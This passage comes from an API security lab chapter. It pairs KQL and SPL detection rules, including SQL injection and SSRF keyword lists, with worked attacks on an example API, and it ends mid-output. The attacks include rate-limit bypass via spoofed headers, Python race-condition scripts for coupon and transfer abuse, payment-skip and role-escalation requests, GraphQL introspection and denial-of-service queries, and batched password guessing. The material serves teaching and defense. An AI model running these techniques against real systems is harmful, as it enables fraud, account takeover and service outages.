let sqli_patterns = dynamic(["UNION SELECT", "OR 1=1", "pg_sleep",
    "CASE WHEN", "information_schema", "DROP TABLE",
    "INSERT INTO", "UPDATE SET", "--", "/*", "*/", "xp_cmdshell"]);
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has_any (sqli_patterns)
    or RequestBody has_any (sqli_patterns)
| project TimeGenerated, ClientIP, Method, URL, RequestBody, StatusCode, UserAgent
| extend AttackType = case(
    URL has "UNION" or RequestBody has "UNION", "UNION-based SQLi",
    URL has "pg_sleep" or RequestBody has "pg_sleep", "Time-based Blind SQLi",
    URL has "OR 1=1" or RequestBody has "OR 1=1", "Boolean-based SQLi",
    "Generic SQLi"
)
| summarize Attempts = count(), AttackTypes = make_set(AttackType) by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: SSRF Attempts

// Detect SSRF attempts via webhook/integration endpoints
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has_any ("/webhook-test", "/integrations/", "/import")
| where RequestBody has_any ("169.254.169.254", "metadata", "10.50.",
    "127.0.0.1", "localhost", "0.0.0.0", "[::]", "0x7f", "2130706433")
| project TimeGenerated, ClientIP, URL, RequestBody, StatusCode
| extend SSRFTarget = extract(@'"url"\s*:\s*"([^"]+)"', 1, RequestBody)
| summarize
    SSRFAttempts = count(),
    Targets = make_set(SSRFTarget, 20)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: Mass Assignment

// Detect mass assignment attempts (fields not in allowed list)
let allowed_fields = dynamic(["full_name", "email", "phone", "address",
    "notification_preferences"]);
ApiAccessLog
| where TimeGenerated > ago(1h)
| where Method == "PATCH" and URL has "/me" or URL matches regex @"/users/[^/]+"
| extend RequestFields = extract_all(@'"(\w+)"\s*:', RequestBody)
| mv-expand RequestField = RequestFields
| where RequestField !in (allowed_fields)
| project TimeGenerated, ClientIP, URL, RequestField, RequestBody, StatusCode
| summarize SuspiciousFields = make_set(RequestField),
            Count = count() by ClientIP, bin(TimeGenerated, 5m)

SPL Detection: SSRF via Internal Network Access

index=api_logs sourcetype=api_access
| search uri_path="/v2/integrations/webhook-test" OR uri_path="/v2/webhooks"
| rex field=request_body "\"url\"\s*:\s*\"(?<target_url>[^\"]+)\""
| eval is_internal=if(
    match(target_url, "^https?://(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|169\.254\.|127\.|localhost|0\.0\.0\.0)"),
    "yes", "no")
| search is_internal="yes"
| stats count as ssrf_attempts, values(target_url) as targets by src_ip, _time span=5m
| sort -ssrf_attempts

Defensive Recommendations

Preventing Injection, Data Exposure, and SSRF

  1. Use parameterized queries everywhere — never interpolate user input into SQL/NoSQL queries, including ORDER BY clauses
  2. Implement response DTOs (Data Transfer Objects) — define explicit response schemas that include only the fields clients need; never return raw database models
  3. Allowlist writable fields for mass assignment — on PATCH/PUT endpoints, explicitly define which fields can be modified and reject all others
  4. Implement SSRF protections:
    • Validate and allowlist destination URLs for webhook/integration features
    • Block requests to private IP ranges (RFC 1918, link-local, loopback)
    • Block requests to cloud metadata services (169.254.169.254)
    • Use IMDSv2 (require PUT-based token) to prevent simple SSRF exploitation
    • Use a dedicated egress proxy with URL filtering
  5. Sanitize error responses — never include SQL queries, stack traces, or internal paths
  6. Implement input validation — validate all input against expected types, patterns, and ranges

Cross-Reference

For SSRF in cloud environments and cloud-specific attack patterns, see Chapter 20: Cloud Attack & Defense. For DevSecOps pipeline integration of API security testing, see Chapter 35: DevSecOps Pipeline.


Exercise 4: Rate Limiting & Business Logic

Objectives

  • Discover and bypass API rate limiting mechanisms
  • Exploit race conditions in API workflows
  • Identify and abuse business logic flaws in financial and administrative workflows
  • Test resource exhaustion through API abuse
  • Chain multiple low-severity issues into high-impact attack paths

OWASP API Mapping

Finding Category OWASP API 2023
Rate limit bypass API4:2023 — Unrestricted Resource Consumption
Race conditions API6:2023 — Unrestricted Access to Sensitive Business Flows
Business logic abuse API6:2023 — Unrestricted Access to Sensitive Business Flows
Resource exhaustion API4:2023 — Unrestricted Resource Consumption

Step 4.1: Rate Limit Analysis and Bypass

Discover Rate Limiting Configuration

# Analyze rate limit headers from multiple endpoints
for endpoint in /v2/me /v2/projects /v2/search /v2/auth/login /v2/admin/users; do
    echo "--- $endpoint ---"
    curl -s -I "https://api.example.com${endpoint}" \
      -H "Authorization: Bearer $TOKEN" 2>/dev/null | grep -i "ratelimit\|retry-after\|x-rate"
    echo ""
done

Expected Output (Synthetic):

--- /v2/me ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 998
x-ratelimit-reset: 1711939600

--- /v2/projects ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 997
x-ratelimit-reset: 1711939600

--- /v2/search ---
x-ratelimit-limit: 100
x-ratelimit-remaining: 99
x-ratelimit-reset: 1711936060

--- /v2/auth/login ---
x-ratelimit-limit: 10
x-ratelimit-remaining: 8
x-ratelimit-reset: 1711936060

--- /v2/admin/users ---
x-ratelimit-limit: 1000
x-ratelimit-remaining: 996
x-ratelimit-reset: 1711939600

Rate Limit Configuration Summary

Endpoint Category Limit Window Scope
General API 1000/hour Per token Global
Search 100/minute Per token Per endpoint
Auth/Login 10/minute Per IP Per endpoint
Admin 1000/hour Per token Global (shared with general)

Bypass Rate Limiting — Header Manipulation

# Test if X-Forwarded-For is trusted for rate limiting
for i in $(seq 1 15); do
    SPOOFED_IP="192.0.2.$((RANDOM % 254 + 1))"
    STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
      -X POST https://api.example.com/v2/auth/login \
      -H "Content-Type: application/json" \
      -H "X-Forwarded-For: $SPOOFED_IP" \
      -d '{"username": "testuser", "password": "REDACTED-WRONG"}')
    echo "Attempt $i (via $SPOOFED_IP): $STATUS"
done

Expected Output (Synthetic):

Attempt 1 (via 192.0.2.142): 401
Attempt 2 (via 192.0.2.87): 401
Attempt 3 (via 192.0.2.203): 401
...
Attempt 14 (via 192.0.2.55): 401
Attempt 15 (via 192.0.2.191): 401

Finding: Rate Limit Bypass via X-Forwarded-For

The login endpoint uses the X-Forwarded-For header for rate limiting instead of the actual client IP. By rotating spoofed IPs, an attacker can perform unlimited authentication attempts, enabling brute-force password attacks. The rate limit of 10/minute/IP is completely bypassable. This is API4:2023 — Unrestricted Resource Consumption.

Bypass Rate Limiting — API Key vs. Token Rotation

# Test if rate limits are per-authentication-method
# Use API key instead of Bearer token to get separate quota
curl -s -I https://api.example.com/v2/search \
  -H "X-API-Key: REDACTED-API-KEY-EXAMPLE" \
  -d '{"query": "test"}' 2>/dev/null | grep -i "ratelimit"

# Rate limit headers show separate counter
# x-ratelimit-limit: 100
# x-ratelimit-remaining: 100   ← Full quota, not shared with Bearer token
# Test if rate limits track across API versions
curl -s -I "https://api.example.com/v1/search?q=test" \
  -H "Authorization: Basic $(echo -n 'testuser:1711936000:user:tenant-001' | base64)" \
  2>/dev/null | grep -i "ratelimit"

# Expected: No rate limit headers on v1 API!

Finding: Legacy API Has No Rate Limiting

The v1 API does not implement any rate limiting, allowing unlimited requests. Combined with the weak authentication, this enables unlimited brute-force and data extraction attacks. This is both API4:2023 — Unrestricted Resource Consumption and API9:2023 — Improper Inventory Management.

Bypass Rate Limiting — Unicode and Encoding Tricks

# Test if URL encoding bypasses rate limit tracking
# Normal request
curl -s -o /dev/null -w "%{http_code}" \
  https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# URL-encoded path (may be tracked separately)
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/v2/%73earch" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# Double-encoded path
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/v2/%2573earch" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

# Case variation
curl -s -o /dev/null -w "%{http_code}" \
  "https://api.example.com/V2/Search" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query": "test"}'

Expected Output (Synthetic):

200  ← Normal - counted against rate limit
200  ← URL encoded - separate rate limit counter!
200  ← Double encoded - separate rate limit counter!
200  ← Case variation - separate rate limit counter!

Finding: Path Normalization Inconsistency

Rate limiting is applied before URL normalization, so /v2/search, /v2/%73earch, /v2/%2573earch, and /V2/Search are tracked as separate endpoints. An attacker can multiply their effective rate limit by using encoding variations. This is API4:2023 — Unrestricted Resource Consumption.

Step 4.2: Race Condition Exploitation

Race Condition — Coupon Application

# Race condition exploit for coupon double-spending (SYNTHETIC - educational only)
import asyncio
import aiohttp
import json

BASE_URL = "https://api.example.com/v2"
TOKEN = "SYNTHETIC_TOKEN_HERE"
COUPON_CODE = "WELCOME50"  # Single-use 50% discount coupon

async def apply_coupon(session, order_id, attempt_num):
    """Send coupon application request."""
    headers = {
        "Authorization": f"Bearer {TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "coupon_code": COUPON_CODE,
        "order_id": order_id
    }

    try:
        async with session.post(
            f"{BASE_URL}/billing/apply-coupon",
            headers=headers,
            json=payload
        ) as response:
            result = await response.json()
            status = response.status
            return {
                "attempt": attempt_num,
                "status": status,
                "result": result
            }
    except Exception as e:
        return {"attempt": attempt_num, "error": str(e)}

async def race_coupon():
    """Fire concurrent coupon application requests."""
    order_id = "order-5001"
    num_concurrent = 20

    async with aiohttp.ClientSession() as session:
        # Create all tasks
        tasks = [
            apply_coupon(session, order_id, i)
            for i in range(num_concurrent)
        ]

        # Fire all requests simultaneously
        results = await asyncio.gather(*tasks)

        # Analyze results
        successes = [r for r in results if r.get("status") == 200]
        print(f"\n[*] Total requests: {num_concurrent}")
        print(f"[*] Successful applications: {len(successes)}")

        for s in successes:
            discount = s["result"].get("discount_applied", "unknown")
            print(f"    Attempt {s['attempt']}: Discount applied = {discount}")

if __name__ == "__main__":
    asyncio.run(race_coupon())

Expected Output (Synthetic):

[*] Total requests: 20
[*] Successful applications: 7
    Attempt 0: Discount applied = 50%
    Attempt 2: Discount applied = 50%
    Attempt 3: Discount applied = 50%
    Attempt 7: Discount applied = 50%
    Attempt 11: Discount applied = 50%
    Attempt 14: Discount applied = 50%
    Attempt 18: Discount applied = 50%

Finding: Race Condition — Coupon Double-Spend

The single-use coupon WELCOME50 was successfully applied 7 times in a single race condition window. The application checks coupon validity and marks it as used in separate database transactions, creating a TOCTOU (Time of Check to Time of Use) vulnerability. At scale, this enables significant financial loss. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.

Race Condition — Account Balance Manipulation

# Race condition on fund transfers (SYNTHETIC - educational only)
import asyncio
import aiohttp

BASE_URL = "https://api.example.com/v2"
TOKEN = "SYNTHETIC_TOKEN_HERE"

async def transfer_funds(session, amount, attempt_num):
    """Transfer funds from account to a recipient."""
    headers = {
        "Authorization": f"Bearer {TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "from_account": "acc-1001",
        "to_account": "acc-1002",
        "amount": amount,
        "currency": "USD"
    }

    async with session.post(
        f"{BASE_URL}/billing/transfer",
        headers=headers,
        json=payload
    ) as response:
        result = await response.json()
        return {
            "attempt": attempt_num,
            "status": response.status,
            "result": result
        }

async def race_transfer():
    """Race condition on fund transfer — account has $100 balance."""
    # Account balance: $100 (SYNTHETIC)
    # Each transfer attempts $100 — only one should succeed

    async with aiohttp.ClientSession() as session:
        tasks = [
            transfer_funds(session, 100.00, i)
            for i in range(10)
        ]

        results = await asyncio.gather(*tasks)

        successes = [r for r in results if r.get("status") == 200]
        total_transferred = len(successes) * 100

        print(f"[*] Account balance: $100.00")
        print(f"[*] Transfer requests: 10 x $100.00")
        print(f"[*] Successful transfers: {len(successes)}")
        print(f"[*] Total transferred: ${total_transferred:.2f}")

        if len(successes) > 1:
            print(f"[!] RACE CONDITION: ${total_transferred - 100:.2f} overdraft!")

if __name__ == "__main__":
    asyncio.run(race_transfer())

Expected Output (Synthetic):

[*] Account balance: $100.00
[*] Transfer requests: 10 x $100.00
[*] Successful transfers: 3
[*] Total transferred: $300.00
[!] RACE CONDITION: $200.00 overdraft!

Finding: Race Condition — Financial Overdraft

Three concurrent $100 transfers succeeded against a $100 balance, resulting in a $200 overdraft. The API reads the balance, validates sufficiency, and deducts in separate operations without proper locking. This is API6:2023 — Unrestricted Access to Sensitive Business Flows with direct financial impact.

Step 4.3: Business Logic Exploitation

Negative Quantity/Price Manipulation

# Test negative quantity in order creation
curl -s -X POST https://api.example.com/v2/billing/orders \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "items": [
      {"product_id": "prod-001", "quantity": -5, "unit_price": 99.99}
    ],
    "billing_address": "123 Test Street"
  }' | jq .

Expected Output (Synthetic):

{
  "order_id": "order-6001",
  "status": "pending",
  "items": [
    {
      "product_id": "prod-001",
      "quantity": -5,
      "unit_price": 99.99,
      "line_total": -499.95
    }
  ],
  "subtotal": -499.95,
  "tax": 0.00,
  "total": -499.95,
  "note": "Credit will be applied to your account"
}

Finding: Negative Quantity Creates Credits

The API accepts negative quantities, resulting in a negative order total that generates account credits. An attacker could create orders with negative quantities to generate unlimited account credit, then use that credit for legitimate purchases. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.

Workflow Manipulation — Skip Payment Step

# Normal order workflow: create → payment → confirm → ship
# Test: skip payment step by directly confirming an unpaid order

# Step 1: Create order
ORDER_RESPONSE=$(curl -s -X POST https://api.example.com/v2/billing/orders \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "items": [
      {"product_id": "prod-001", "quantity": 1, "unit_price": 499.99}
    ]
  }')
ORDER_ID=$(echo $ORDER_RESPONSE | jq -r '.order_id')
echo "Order created: $ORDER_ID"

# Step 2: Skip payment — directly confirm
curl -s -X POST "https://api.example.com/v2/billing/orders/${ORDER_ID}/confirm" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"confirm": true}' | jq .

Expected Output (Synthetic):

{
  "order_id": "order-6002",
  "status": "confirmed",
  "payment_status": "pending",
  "items": [
    {
      "product_id": "prod-001",
      "quantity": 1,
      "unit_price": 499.99
    }
  ],
  "total": 499.99,
  "confirmed_at": "2026-04-01T11:00:00Z",
  "estimated_shipping": "2026-04-03"
}

Finding: Payment Step Bypass

The order confirmation endpoint does not validate that payment has been received. An order can be confirmed and queued for shipping without any payment. The workflow does not enforce state machine transitions. This is API6:2023 — Unrestricted Access to Sensitive Business Flows.

Privilege Escalation via Invitation Flow

# Business logic: invite a user to a project with elevated role
# Standard users can invite collaborators with "viewer" role
# Test: invite self with "owner" role

curl -s -X POST "https://api.example.com/v2/projects/proj-1001/collaborators" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "user_id": "user-1001",
    "role": "owner",
    "send_notification": false
  }' | jq .

Expected Output (Synthetic):

{
  "project_id": "proj-1001",
  "collaborator": {
    "user_id": "user-1001",
    "username": "testuser",
    "role": "owner",
    "added_at": "2026-04-01T11:05:00Z"
  },
  "message": "Collaborator role updated successfully"
}

Finding: Self-Elevation via Invitation

A user can invite themselves to a project with the "owner" role, overriding their existing permissions. The API does not restrict the roles that can be assigned through the invitation endpoint. This is a business logic flaw under API5:2023 — Broken Function Level Authorization.

Step 4.4: Resource Exhaustion

Test Large Payload Processing

# Test maximum request body size
python3 -c "
import json
# Generate a large but valid JSON payload
large_payload = {
    'query': 'A' * 1000000,  # 1MB string
    'type': 'projects',
    'limit': 10
}
print(json.dumps(large_payload))
" | curl -s -X POST https://api.example.com/v2/search \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d @- -w "\nTime: %{time_total}s\nSize: %{size_download} bytes\n"

Expected Output (Synthetic):

{"error": "Search query too long", "max_length": 10000}
Time: 12.456s
Size: 56 bytes

Finding: Slow Response on Large Payloads

While the server eventually rejects the oversized query, it takes 12+ seconds to respond. The server is processing/validating the full 1MB payload before rejecting it. A concurrent flood of large payloads could cause denial of service. This is API4:2023 — Unrestricted Resource Consumption.

Test Pagination Abuse

# Request extremely large page sizes
curl -s "https://api.example.com/v2/projects?page=1&per_page=999999" \
  -H "Authorization: Bearer $TOKEN" \
  -w "\nTime: %{time_total}s\nSize: %{size_download} bytes\n" | tail -3

Expected Output (Synthetic):

Time: 8.234s
Size: 4521890 bytes

Finding: No Maximum Page Size Enforcement

The API accepts a per_page value of 999999 and returns all records (4.5MB response). This enables data exfiltration in a single request and can cause performance degradation. The API should enforce a maximum page size (e.g., 100). This is API4:2023 — Unrestricted Resource Consumption.

Test File Upload Resource Exhaustion

# Generate and upload a large file (SYNTHETIC)
dd if=/dev/urandom bs=1M count=500 2>/dev/null | \
  curl -s -X POST https://api.example.com/v2/projects/proj-1001/files \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@-;filename=large_file.bin" \
    -F "description=test upload" \
    -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

{
  "file_id": "file-9001",
  "filename": "large_file.bin",
  "size_bytes": 524288000,
  "status": "uploaded",
  "storage_path": "s3://novaplatform-files-staging/tenant-001/proj-1001/file-9001"
}
Time: 45.678s

Finding: No File Size Limit Enforcement

The API accepted a 500MB file upload without restriction. Repeated large uploads could exhaust storage quotas, S3 costs, and bandwidth. This is API4:2023 — Unrestricted Resource Consumption.

Detection & Defense — Exercise 4

KQL Detection: Rate Limit Bypass Attempts

// Detect X-Forwarded-For rotation for rate limit bypass
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "/auth/login"
| extend ForwardedFor = extract(@"X-Forwarded-For:\s*([^,\r\n]+)", 1, RequestHeaders)
| summarize
    UniqueForwardedIPs = dcount(ForwardedFor),
    RequestCount = count(),
    StatusCodes = make_bag(pack(tostring(StatusCode), 1))
    by ActualClientIP, bin(TimeGenerated, 5m)
| where UniqueForwardedIPs > 3 and RequestCount > 10
| project TimeGenerated, ActualClientIP, UniqueForwardedIPs, RequestCount, StatusCodes

KQL Detection: Race Condition Indicators

// Detect rapid identical requests (race condition attempts)
ApiAccessLog
| where TimeGenerated > ago(5m)
| where Method == "POST"
| where URL has_any ("/billing/", "/transfer", "/coupon", "/confirm")
| summarize
    RequestCount = count(),
    TimeSpread_ms = datetime_diff('millisecond', max(TimeGenerated), min(TimeGenerated)),
    UniquePayloads = dcount(RequestBody)
    by ClientIP, URL, bin(TimeGenerated, 1s)
| where RequestCount > 5 and TimeSpread_ms < 1000
| where UniquePayloads <= 2  // Same or very similar payloads
| project TimeGenerated, ClientIP, URL, RequestCount, TimeSpread_ms

SPL Detection: Business Logic Abuse

index=api_logs sourcetype=api_access method=POST
| search uri_path="/v2/billing/orders" OR uri_path="/v2/billing/apply-coupon"
| rex field=request_body "\"quantity\"\s*:\s*(?<quantity>-?\d+)"
| rex field=request_body "\"total\"\s*:\s*(?<total>-?[\d.]+)"
| eval is_suspicious=if(quantity < 0 OR total < 0, "yes", "no")
| search is_suspicious="yes"
| stats count as abuse_attempts, sum(total) as total_credit_generated by src_ip, user_id
| sort -total_credit_generated

Defensive Recommendations

Securing Rate Limiting and Business Logic

  1. Rate limit by authenticated identity, not IP — use the JWT subject claim or API key as the rate limit key, not headers like X-Forwarded-For
  2. Normalize URLs before rate limiting — decode URL encoding, normalize case, and resolve path traversals before applying rate limits
  3. Enforce maximum page sizes — set and enforce a maximum per_page value (e.g., 100) at the API gateway level
  4. Implement idempotency keys — require unique idempotency keys for financial operations to prevent race conditions
  5. Use database-level locks for critical operations — apply SELECT FOR UPDATE or advisory locks on coupon redemption, fund transfers, and other critical state changes
  6. Validate business rules at every step — enforce state machine transitions (e.g., order must be in "paid" status before confirmation)
  7. Validate numeric ranges — reject negative quantities, prices, and amounts at the API input validation layer
  8. Enforce file upload limits — set maximum file sizes per upload and per-tenant storage quotas
  9. Implement request body size limits — reject requests exceeding a reasonable body size (e.g., 10KB for search, 100MB for file uploads) at the API gateway

Cross-Reference

For vulnerability management and remediation tracking for these issues, see Chapter 29: Vulnerability Management.


Exercise 5: GraphQL Security Testing

Objectives

  • Exploit GraphQL introspection to map the entire schema
  • Abuse query depth and complexity to cause denial of service
  • Perform batching attacks to bypass rate limiting and brute-force authentication
  • Exploit field suggestion to enumerate schema details even without introspection
  • Test for authorization bypass in GraphQL resolvers
  • Identify data exposure through GraphQL query flexibility

OWASP API Mapping

Finding Category OWASP API 2023
Introspection exposure API8:2023 — Security Misconfiguration
Query depth abuse API4:2023 — Unrestricted Resource Consumption
Batching attacks API4:2023 — Unrestricted Resource Consumption
Authorization bypass in resolvers API1:2023 — Broken Object Level Authorization
Field suggestion exploitation API8:2023 — Security Misconfiguration

Step 5.1: GraphQL Introspection Attack

Full Schema Introspection

# Send introspection query to retrieve the full GraphQL schema
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ __schema { types { name kind description fields { name type { name kind ofType { name kind } } args { name type { name kind } } } } } }"
  }' | jq '.data.__schema.types | map(select(.kind == "OBJECT")) | .[].name'

Expected Output (Synthetic):

"Query"
"Mutation"
"Subscription"
"User"
"UserProfile"
"UserCredentials"
"Project"
"ProjectAnalytics"
"File"
"FileVersion"
"AuditEntry"
"Tenant"
"TenantConfig"
"BillingAccount"
"Invoice"
"Webhook"
"WebhookDelivery"
"SearchResult"
"InternalMetrics"
"DebugInfo"

Finding: Full Introspection Enabled

GraphQL introspection is enabled and returns the complete schema, including sensitive types like UserCredentials, TenantConfig, InternalMetrics, and DebugInfo. This gives attackers a complete map of all queryable data. This is API8:2023 — Security Misconfiguration. Introspection should be disabled in production.

Extract Full Schema Detail

# Detailed introspection — get all fields, arguments, and types
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
  }' | jq . > graphql-schema.json

# Count types, queries, and mutations
echo "Types: $(jq '.data.__schema.types | length' graphql-schema.json)"
echo "Queries: $(jq '.data.__schema.queryType.name' graphql-schema.json)"

# List all queries
jq -r '.data.__schema.types[] | select(.name == "Query") | .fields[] | "  \(.name)(\(.args | map(.name) | join(", ")))"' graphql-schema.json

Expected Output (Synthetic):

Types: 42
Queries: "Query"

  me()
  user(id)
  users(tenant, role, limit, offset)
  project(id)
  projects(tenant, status, limit, offset)
  projectAnalytics(projectId, startDate, endDate)
  file(id)
  files(projectId, type, limit, offset)
  search(query, type, limit)
  auditLog(tenant, startDate, endDate, limit)
  tenant(id)
  tenants(limit, offset)
  billingAccount(userId)
  invoices(userId, status, limit)
  webhooks(projectId)
  internalMetrics(service)
  debugInfo()

List All Mutations

jq -r '.data.__schema.types[] | select(.name == "Mutation") | .fields[] | "  \(.name)(\(.args | map(.name) | join(", ")))"' graphql-schema.json

Expected Output (Synthetic):

  createUser(input)
  updateUser(id, input)
  deleteUser(id)
  createProject(input)
  updateProject(id, input)
  deleteProject(id)
  uploadFile(projectId, file, metadata)
  deleteFile(id)
  createWebhook(input)
  updateWebhook(id, input)
  deleteWebhook(id)
  updateBilling(userId, input)
  applyDiscount(userId, code)
  impersonateUser(targetUserId)
  resetUserPassword(userId)
  updateTenantConfig(tenantId, config)
  executeQuery(sql)
  clearCache(pattern)

Finding: Administrative Mutations Exposed

The introspection reveals mutations for impersonateUser, resetUserPassword, updateTenantConfig, executeQuery (raw SQL!), and clearCache. These should not be exposed to regular users. This is API5:2023 — Broken Function Level Authorization.

Visualize Schema Relationships

# Generate schema visualization data (SYNTHETIC - educational only)
import json

with open('graphql-schema.json', 'r') as f:
    schema = json.load(f)

# Extract type relationships
types = schema['data']['__schema']['types']
object_types = [t for t in types if t['kind'] == 'OBJECT' and not t['name'].startswith('__')]

print("=== GraphQL Schema Relationships ===\n")
for t in object_types:
    if t.get('fields'):
        print(f"[{t['name']}]")
        for field in t['fields']:
            field_type = field['type']
            type_name = field_type.get('name') or (
                field_type.get('ofType', {}).get('name', 'Unknown')
            )
            print(f"  ├── {field['name']}: {type_name}")
        print()

Expected Output (Synthetic):

=== GraphQL Schema Relationships ===

[User]
  ├── id: ID
  ├── username: String
  ├── email: String
  ├── role: String
  ├── tenant: Tenant
  ├── profile: UserProfile
  ├── credentials: UserCredentials
  ├── projects: Project
  ├── apiKeys: ApiKey
  ├── billingAccount: BillingAccount

[UserCredentials]
  ├── passwordHash: String
  ├── mfaSecret: String
  ├── lastPasswordChange: DateTime
  ├── failedLoginAttempts: Int
  ├── accountLocked: Boolean

[Project]
  ├── id: ID
  ├── name: String
  ├── owner: User
  ├── collaborators: User
  ├── files: File
  ├── analytics: ProjectAnalytics
  ├── tenant: Tenant

[Tenant]
  ├── id: ID
  ├── name: String
  ├── config: TenantConfig
  ├── users: User
  ├── projects: Project
  ├── billingAccount: BillingAccount

[DebugInfo]
  ├── databaseUrl: String
  ├── redisUrl: String
  ├── jwtSecret: String
  ├── awsAccessKey: String
  ├── awsSecretKey: String
  ├── environment: String

Step 5.2: Query Depth and Complexity Abuse

Deeply Nested Query Attack

# Test query depth limits with deeply nested relationship traversal
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { projects { owner { projects { owner { projects { owner { projects { owner { projects { owner { username } } } } } } } } } } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "me": {
      "projects": [
        {
          "owner": {
            "projects": [
              {
                "owner": {
                  "projects": [
                    {
                      "owner": {
                        "projects": [
                          {
                            "owner": {
                              "projects": [
                                {
                                  "owner": {
                                    "username": "testuser"
                                  }
                                }
                              ]
                            }
                          }
                        ]
                      }
                    }
                  ]
                }
              }
            ]
          }
        }
      ]
    }
  }
}

Finding: No Query Depth Limit

The GraphQL server processes a query with 10+ levels of nesting without restriction. Deeply nested queries on circular relationships (User → Projects → Owner → Projects → ...) cause exponential database joins and can exhaust server resources. This is API4:2023 — Unrestricted Resource Consumption.

Complexity-Based Denial of Service

# Generate a query with extreme complexity (SYNTHETIC - educational only)
import requests
import json

# Build a wide query that requests all fields on many types
wide_query = """
{
  users(limit: 1000) {
    id
    username
    email
    role
    profile {
      fullName
      phone
      address
      bio
    }
    credentials {
      passwordHash
      mfaSecret
      lastPasswordChange
      failedLoginAttempts
    }
    projects {
      id
      name
      description
      files {
        id
        filename
        size
        versions {
          id
          uploadedAt
          uploadedBy {
            username
            email
          }
        }
      }
      analytics {
        totalViews
        uniqueVisitors
        averageSessionDuration
      }
      collaborators {
        id
        username
        role
      }
    }
    billingAccount {
      balance
      invoices(limit: 100) {
        id
        amount
        status
        lineItems {
          description
          quantity
          unitPrice
        }
      }
    }
  }
}
"""

response = requests.post(
    "https://graphql.example.com/query",
    headers={
        "Content-Type": "application/json",
        "Authorization": "Bearer SYNTHETIC_TOKEN_HERE"
    },
    json={"query": wide_query},
    timeout=60
)

print(f"Status: {response.status_code}")
print(f"Response size: {len(response.content)} bytes")
print(f"Response time: {response.elapsed.total_seconds()}s")

Expected Output (Synthetic):

Status: 200
Response size: 15728640 bytes    ← ~15MB response
Response time: 23.456s           ← 23+ seconds to process

Finding: No Query Complexity Analysis

The server processed a query requesting 1000 users with all nested relationships, producing a 15MB response in 23 seconds. There is no query complexity limit, cost analysis, or timeout protection. A small number of concurrent complex queries could cause a full denial of service. This is API4:2023 — Unrestricted Resource Consumption.

Recursive Fragment Attack (Resource Exhaustion)

# Fragment-based circular reference attack
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "query { me { ...UserFields } } fragment UserFields on User { projects { owner { ...UserFields } } }"
  }' -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 30.000s  ← Request timed out after 30 seconds

Finding: Recursive Fragment Causes Server Hang

A recursive fragment reference (UserFields references itself through the owner relationship) causes the server to enter an infinite loop until the request times out. This is a denial-of-service vector. The server should detect and reject circular fragment references. This is API4:2023 — Unrestricted Resource Consumption.

Step 5.3: Batching Attacks

Authentication Brute-Force via Batching

# GraphQL allows multiple operations in a single request
# Use batching to bypass per-request rate limits on authentication
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -d '[
    {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"password2\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"password3\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"letmein\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"admin123\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"REDACTED\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"qwerty\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"welcome1\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"changeme\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"test1234\") { token } }"}
  ]' | jq .

Expected Output (Synthetic):

[
